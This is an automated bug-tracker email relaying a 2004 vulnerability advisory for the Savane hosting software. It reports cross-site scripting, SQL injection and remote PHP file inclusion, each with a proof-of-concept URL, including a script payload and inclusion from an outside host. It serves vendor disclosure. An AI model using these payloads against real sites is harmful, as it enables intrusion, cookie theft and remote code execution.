This mail is an automated notification from the bugs tracker of the project: Savane.
/**************************************************************************/ [bugs #724] Full Item Snapshot: URL: <http://gna.org/bugs/?func=detailitem&item_id=724> Project: Savane Submitted by: Joxean Koret On: jue 16/09/04 at 21:53 Category: Web Frontend Severity: 6 - Security Priority: C - Normal Resolution: None Privacy: Private Assigned to: None Status: Open Release: Latest Planned Release: Summary: Multiple vulnerabilities in Savane Product Original Submission: --------------------------------------------------------------------------- Multiple Vulnerabilities in Savane --------------------------------------------------------------------------- Author: Jose Antonio Coret (Joxean Koret) Date: 2004 Location: Basque Country --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Savane Latest (Released at 24-Aug-2004 08:23) Savane is a Web-based Libre Software hosting system. It currently includes issue tracking (bugs, task, support), project and member management, mailing lists, and individual account maintenance. Web : https://gna.org/projects/savane --------------------------------------------------------------------------- Vulnerabilities: ~~~~~~~~~~~~~~~~ A. Cross Site Scripting A1. I have found a Cross Site Scripting vulnerability in the PHP login form. To try the vulnerability you can view the following URL : http(s)://<site-with-savane>/account/login.php?form_loginname="><script>alert(document.cookie)</script> B. SQL Injection Vulnerabilities B1. I have found various SQL Injection vulnerabilities. The Savane product is only affected if : A) The environment variable SV_LOCAL_INC_PREFIX is defined and B) PHP is configured with "magic_quotes_gpc" to "On" and C) Register_globas directive is set to on in the file php.ini The following php scripts are vulnerables : http://localhost/savane/account/updateprefs.php?form_use_cvsadmin=SQL_INJECTION http://localhost/savane/account/pending-resend.php?form_use_cvsadmin=SQL_INJECTION http://localhost/savane/account/lostpw-confirm.php?form_loginname=SQL_Injection http://localhost/savane/account/logout.php?session_hash=SQLInjection http://localhost/savane/account/login.php?user_id=SQLINJECTION&session_hash=SQLINJECTION C. Remote Code Execution C1. The first remote PHP code execution vulnerability that I found is only exploitable if magic_quotes_gpc is set to on. To try this : http://localhost/savane/include/stats_function.php?sys_urlroot=http://fuckingsite.com? I have found various other vulnerabilities of the same kind, but are only exploitables if the SV_LOCAL_INC_PREFIX environment variable is defined (always) and the register_globals is set to on. Examples: http://localhost/savane/include/pre.php?sys_urlroot=http://fuckingsite.com? http://localhost/savane/account/lostlogin.php?sys_urlroot=http://fuckingsite.com? Disclaimer: ~~~~~~~~~~~ The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. --------------------------------------------------------------------------- Contact: ~~~~~~~~ Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es CC List ------- CC Address | Comment ------------------------------------+----------------------------- beuc --AT-- gnu --DOT-- org | I think that you need to be advised. For detailed info, follow this link: <http://gna.org/bugs/?func=detailitem&item_id=724> _______________________________________________ Message sent via/by Gna! http://gna.org/
